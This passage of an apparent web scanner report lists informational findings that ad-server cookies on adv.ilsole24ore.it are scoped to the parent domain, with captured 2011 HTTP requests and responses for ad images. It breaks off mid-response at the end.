Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/07/sole5/shopping24/44374678/Top/OasDefault/Experteer_SGR_am_110503/IT_Leaderboard_728x90no_button_copy.gif/61646331643666333464626633303930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/07/sole5/shopping24/44374678/Top/OasDefault/Experteer_SGR_am_110503/IT_Leaderboard_728x90no_button_copy.gif/61646331643666333464626633303930 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: adv.ilsole24ore.it
Cookie: RMID=adc1d6f34dbf3090

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:01 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFD=011QH1dtO10CUN; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Content-Length: 14822
Connection: close
Content-Type: image/gif

...[SNIP]...

14.17. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1301110576/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1301110576/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1301110576/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUG088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:17:36 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUI088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif


14.18. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1494137922/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1494137922/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1494137922/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUD088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:59:24 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUE088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.19. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1694123445/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1694123445/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1694123445/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUI088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:30:08 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUK088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.20. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747038723/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1747038723/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1747038723/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUK088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:42:39 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUM088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.21. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747140575/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1747140575/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1747140575/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUJ088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:36:23 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUL088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.22. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1845993609/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1845993609/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1845993609/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUH088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:23:52 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUJ088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.23. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1968511751/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/1968511751/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/1968511751/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUC088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:53:53 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUD088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.24. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:18:06 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1ROU1088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.25. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/220106844/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/220106844/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/220106844/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUF088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:11:18 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUH088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.26. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/482545817/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/482545817/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/482545817/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUE088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:45 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUF088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.27. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/558533179/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/558533179/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/558533179/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN; RMFL=011QH1NVU1088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:03 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVU2088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.28. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/669678699/VideoBox_2/OasDefault/Experteer_SGR_am_110503/300x250_solo_posizioni_per_dirigenti84894.gif/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/669678699/VideoBox_2/OasDefault/Experteer_SGR_am_110503/300x250_solo_posizioni_per_dirigenti84894.gif/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/669678699/VideoBox_2/OasDefault/Experteer_SGR_am_110503/300x250_solo_posizioni_per_dirigenti84894.gif/61646331643666333464626632633930 HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:54 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFD=011QH1NKO10CUN; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Content-Length: 36093
Connection: close
Content-Type: image/gif

GIF89a,................................................................................m.................W...........l..@..........1.............................F..\.......6..w........~z.d..oh......
...[SNIP]...

14.29. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/725179361/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/725179361/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/725179361/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN; RMFL=011QH1NVU2088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:25 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVU3088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.30. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/741128699/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/741128699/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/741128699/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUM088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:55:10 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
